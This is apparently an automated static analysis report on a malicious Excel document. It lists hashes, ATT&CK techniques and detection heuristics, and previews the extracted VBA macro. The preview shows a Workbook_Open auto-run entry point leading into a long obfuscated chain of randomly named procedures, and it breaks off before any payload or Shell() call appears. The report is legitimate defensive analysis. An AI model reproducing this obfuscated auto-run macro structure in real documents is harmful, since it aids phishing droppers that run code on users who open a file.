Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9cccdb290dbbedfe…

MALICIOUS

Office (OLE)

Size: 466.5 KB
Created: 2017-07-20 03:50:40
Authoring application: Microsoft Excel
First seen: 2018-09-04
MD5: 4145a90fd408d592dc5cbcc60e5382db
SHA-1: b7abc6f82e2db3292d31928b285d8cdaf2c4f9ec
SHA-256: 9cccdb290dbbedfe54beb36d6359e711aee1b20f6b2b1563b32fb459a92d4b95
Risk score: 188

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The file is an Excel document containing a Workbook_Open VBA macro, a common technique for triggering malicious execution as soon as the document is opened. The macro contains a Shell() call, indicating that it attempts to run external commands or to download and execute a payload. The VBA code is heavily obfuscated (a long chain of randomly named procedures that each call the next), which makes the exact payload or destination hard to determine statically, but the combination of the Shell() call and the Workbook_Open event strongly suggests downloader or dropper functionality.

Heuristics (5)

  • ClamAV: Xls.Malware.Valyria-10036513-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036513-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • Workbook_Open macro [high] (OLE_VBA_WBOPEN)
    Workbook_Open macro
  • Environ() call (env variable access) [low] (OLE_VBA_ENVIRON)
    Environ() call (env variable access)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 118916 bytes
SHA-256: 7f68b64bf9b5962d9baecf4230bc629a811c145c7e3ee5106d17759bd5bd41bc

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Sub WOrKbOoK_oPEn(): Call lBxJFPAawuYjrCdvsD: End Sub
Sub lBxJFPAawuYjrCdvsD()
Call jnjHzsZgELibSnPETo
End Sub
Static Sub jnjHzsZgELibSnPETo()
Call CLYRHzQipOvkQzFSDu
End Sub
Private Sub CLYRHzQipOvkQzFSDu()
Call mzoyKpHssFcwCcVzLS
End Sub
Function mzoyKpHssFcwCcVzLS() As Currency
Call acwnFbHDjgbzrVcxCs
End Function
Private Sub acwnFbHDjgbzrVcxCs()
Call hNONJukHMyDedMuaqm
End Sub
Private Function hNONJukHMyDedMuaqm() As Single
Call ZqLqkcNQmALbwIsinR
End Function
Function ZqLqkcNQmALbwIsinR() As Long
Call znMiNcUqAqNbPyskHd
End Function
Static Sub znMiNcUqAqNbPyskHd()
Call SoOshjWDLWzOJCvWMl
End Sub
Sub SoOshjWDLWzOJCvWMl()
Call vtVKbgcrokziyOBWMA
End Sub
Function vtVKbgcrokziyOBWMA() As Date
Call zESqqCSVapxQudzUXs
End Function
Private Sub zESqqCSVapxQudzUXs()
Call PLDstMqMxdVEuijrEt
End Sub
Sub PLDstMqMxdVEuijrEt()
Call oaSDvNozoHDggeyaVF
End Sub
Private Function oaSDvNozoHDggeyaVF() As Byte
Call MJviWPcyHZSkmfcpjS
End Function
Private Function MJviWPcyHZSkmfcpjS()
Call DtJxiyaWMZPIxuqmGu
End Function
Static Sub DtJxiyaWMZPIxuqmGu()
Call LWLlBQiMLsDMrRsZVr
End Sub
Static Sub LWLlBQiMLsDMrRsZVr()
Call IxzCHtnUWUUCqQfrYa
End Sub
Sub IxzCHtnUWUUCqQfrYa()
Call nmZvfoBfplrUxqFOZt
End Sub
Sub nmZvfoBfplrUxqFOZt()
Call IDySBtXTvpQDEjfnkB
End Sub
Private Function IDySBtXTvpQDEjfnkB() As Object
Call atCviBEhIgKpWAjhRG
End Function
Private Sub atCviBEhIgKpWAjhRG()
Call QOtxrlheTJURUbarij
End Sub
Private Function QOtxrlheTJURUbarij() As Variant
Call SXIjEJZYmWPZeXpmwW
End Function
Private Sub SXIjEJZYmWPZeXpmwW()
Call MrpatpfThaivHAWFTD
End Sub
Static Function MrpatpfThaivHAWFTD() As Double
Call GWVxWVFNaStSMOCQOm
End Function
Static Sub GWVxWVFNaStSMOCQOm()
Call CGZANzgjQtAkCgFWsT
End Sub
Function CGZANzgjQtAkCgFWsT() As Currency
Call zsLyHcFpZKJbdRrgTE
End Function
Function zsLyHcFpZKJbdRrgTE()
Call SRAIOiwsKNXlcehtDK
End Function
Sub SRAIOiwsKNXlcehtDK()
Call DFQpRYnBNEDxOGxaLi
End Sub
Private Function DFQpRYnBNEDxOGxaLi() As Integer
Call riYeMKnMDgCADAEYCI
End Function
Static Sub riYeMKnMDgCADAEYCI()
Call xSqEReQQhxefoqWBqC
End Sub
Private Sub xSqEReQQhxefoqWBqC()
Call qvnhrLsZHzmcImUJnh
End Sub
Function qvnhrLsZHzmcImUJnh() As Object
Call CXfJqZdOqskZhMMGIh
End Function
Static Function CXfJqZdOqskZhMMGIh() As Integer
Call itqjpTCNgVaPVgXxMB
End Function
Function itqjpTCNgVaPVgXxMB() As Long
Call SLQcNHoqvHOCKYtjJF
End Function
Private Sub SLQcNHoqvHOCKYtjJF()
Call WWNIcddUgMLkGnqhUx
End Sub
Private Function WWNIcddUgMLkGnqhUx() As Integer
Call YIpuCBeZZDeVMbSABm
End Function
Private Function YIpuCBeZZDeVMbSABm() As Integer
Call KtNVioAyueSAsnqnSK
End Function
Static Sub KtNVioAyueSAsnqnSK()
Call jbrzJqoxNwgEypUCgX
End Sub
Static Sub jbrzJqoxNwgEypUCgX()
Call MqwzqnOjoAYaPnZuEo
End Sub
Function MqwzqnOjoAYaPnZuEo() As Byte
Call ElIvqVgFrqNzColiyS
End Function
Function ElIvqVgFrqNzColiyS() As String
Call jPkIZQbSMRsQhcNOcj
End Function
Function jPkIZQbSMRsQhcNOcj() As Byte
Call QwuOLJTPAkaHxjXwDE
End Function
Function QwuOLJTPAkaHxjXwDE() As Date
Call TPHhMgfHQnNQkRkiou
End Function
Static Sub TPHhMgfHQnNQkRkiou()
Call ATEolZOtecXdEghsvO
End Sub
Private Sub ATEolZOtecXdEghsvO()
Call YrjlYbhvzEughwMQmY
End Sub
Function YrjlYbhvzEughwMQmY() As Double
Call OWZUWLfpIXwKHICRaC
End Function
Static Sub OWZUWLfpIXwKHICRaC()
Call qtuGpJbpOZdGQZXyXR
End Sub
Function qtuGpJbpOZdGQZXyXR() As
... (truncated)